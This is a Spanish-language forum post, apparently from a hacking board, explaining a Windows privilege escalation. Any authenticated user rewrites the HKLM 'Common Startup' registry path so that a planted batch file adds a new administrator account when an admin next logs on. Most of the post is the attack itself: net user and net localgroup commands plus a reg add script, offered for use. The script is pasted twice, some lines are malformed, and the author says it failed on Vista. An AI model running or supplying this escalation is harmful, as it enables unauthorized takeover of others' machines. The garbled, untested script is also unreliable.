El fallo esta en que cualquier usuario autentificado puede modificar el valor de la clave : \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Common Startup\"
que contiene la ruta de la famosa \"Carpeta de Inicio\" aunque no se tengan privilegios de admin.
Modificamos el valor de dicha clave y colocamos la ruta de otra carpeta que previamente hayamos creado, en dicha carpeta tambien es necesario que incluyamos el siguiente script batch:
Código:
net user <nombre_cuenta> /add /domain
net localgroup <nombre_grupo_admins> <nombre_cuenta> /add
net localgroup <nombre_grupo_admins> <nombre_cuenta> /add
Como sabreis sin privilegios de admin ese script no finalizara sin error, pero al modificar la ruta de la carpeta de inicio, en el proximo inicio de sesion del admin se ejecutara correctamente.
Resumido en este script:
Código:
:: Fallos en los permisos del registro de Windows NT
:: Fuente : http://www.hispasec.com/unaaldia/499
:: Definir las varibles:
set RUTA=<ruta_de_la_nueva_carpeta_de_inicio>
if not exist \"\"\"%RUTA%\"\"\" echo La ruta no existe&exit /B 1
reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /v \"Common Startup\" /t REG_EXPAND_SZ /d \"\"\"%RUTA%\"\"\" /f
> %RUTA%\\win32.bat echo
net user <nombre_cuenta> /add /domain
>> %RUTA%\\win32.bat echo
net localgroup administrators <nombre_cuenta> /add /domain
if errorlevel 0 echo Exito !&exit /B 0
:: Fuente : http://www.hispasec.com/unaaldia/499
:: Definir las varibles:
set RUTA=<ruta_de_la_nueva_carpeta_de_inicio>
if not exist \"\"\"%RUTA%\"\"\" echo La ruta no existe&exit /B 1
reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /v \"Common Startup\" /t REG_EXPAND_SZ /d \"\"\"%RUTA%\"\"\" /f
> %RUTA%\\win32.bat echo
net user <nombre_cuenta> /add /domain
>> %RUTA%\\win32.bat echo
net localgroup administrators <nombre_cuenta> /add /domain
if errorlevel 0 echo Exito !&exit /B 0
Ya tendremos una nueva cuenta.
Problemas que he encontrado: en mi Vista no puedes modificar la clave sin ser usuario avanzado, asi que por favor que alguien la pruebe en un XP.
Fuente: http://www.hispasec.com/unaaldia/499










Autor


En línea




